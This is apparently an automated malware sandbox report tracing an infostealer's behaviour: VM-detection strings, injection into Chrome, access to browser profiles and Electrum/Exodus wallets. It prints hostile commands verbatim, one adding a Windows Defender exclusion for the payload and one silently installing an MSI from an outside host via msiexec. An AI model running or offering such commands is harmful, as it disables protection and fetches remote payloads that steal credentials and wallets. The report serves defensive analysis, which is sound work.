Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Serviceb
Source: 0xBKHFISYHPX.exe, 00000019.00000000.1613205512.00007FF70A42C000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: vmware
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipes\f%
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid PartitionH
Source: chrome.exe, 00000000.00000002.1952278977.00000166840B4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor
Source: 0xBKHFISYHPX.exe, 00000019.00000000.1613205512.00007FF70A42C000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: bad conversionvirtualvmwareoracleinnotekAuthenticAMDGenuineIntelManufacturerselect * from Win32_BIOSSMBIOSBIOSVersion\\?\c:\
Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition`f1
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Thread created: unknown EIP: 87610000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Section loaded: NULL target: C:\Windows\System32\cmd.exe protection: readonly Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Thread register set: target process: 4352 Jump to behavior
Source: C:\Windows\System32\cmd.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 16687610000 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /i https://kolepti.com/flare.msi /qn Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\." /SETINTEGRITYLEVEL (CI)(OI)HIGH Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe Jump to behavior
Source: chrome.exe, 00000000.00000002.1949754837.0000016680DB1000.00000002.00000001.00040000.00000008.sdmp Binary or memory string: Shell_TrayWnd
Source: chrome.exe, 00000000.00000002.1949754837.0000016680DB1000.00000002.00000001.00040000.00000008.sdmp Binary or memory string: Progman
Source: chrome.exe, 00000000.00000002.1949754837.0000016680DB1000.00000002.00000001.00040000.00000008.sdmp Binary or memory string: RProgram Manager
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4111.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.22621.4036.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4111.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-US~10.0.22621.3958.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Code function: 25_0_00007FF708FFE218 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 25_0_00007FF708FFE218
Source: C:\Windows\SysWOW64\expand.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1636324703.0000020D26D62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0xBKHFISYHPX.exe PID: 3844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Hueta.exe PID: 4916, type: MEMORYSTR
Source: Yara match File source: 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0xBKHFISYHPX.exe PID: 3844, type: MEMORYSTR
Source: cmd.exe, 0000001D.00000003.1863337138.00000226096D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: wallets\Electrum
Source: cmd.exe, 0000001D.00000003.1863337138.00000226096D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: wallets\Exodus\exodus.wallet
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1937025690.0000020DC8FEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum (USDT ERC-20)
Source: chrome.exe, 00000000.00000002.1949807943.0000016682202000.00000004.00000001.00040000.00000010.sdmp String found in binary or memory: ProtoDB.LoadEntriesSuccess.GCMKeyStore
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7lm9kv4h.default Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\aqo0o2a7.default-release Jump to behavior

Remote Access Functionality

Source: Yara match File source: 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1636324703.0000020D26D62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0xBKHFISYHPX.exe PID: 3844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Hueta.exe PID: 4916, type: MEMORYSTR
Source: Yara match File source: 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0xBKHFISYHPX.exe PID: 3844, type: MEMORYSTR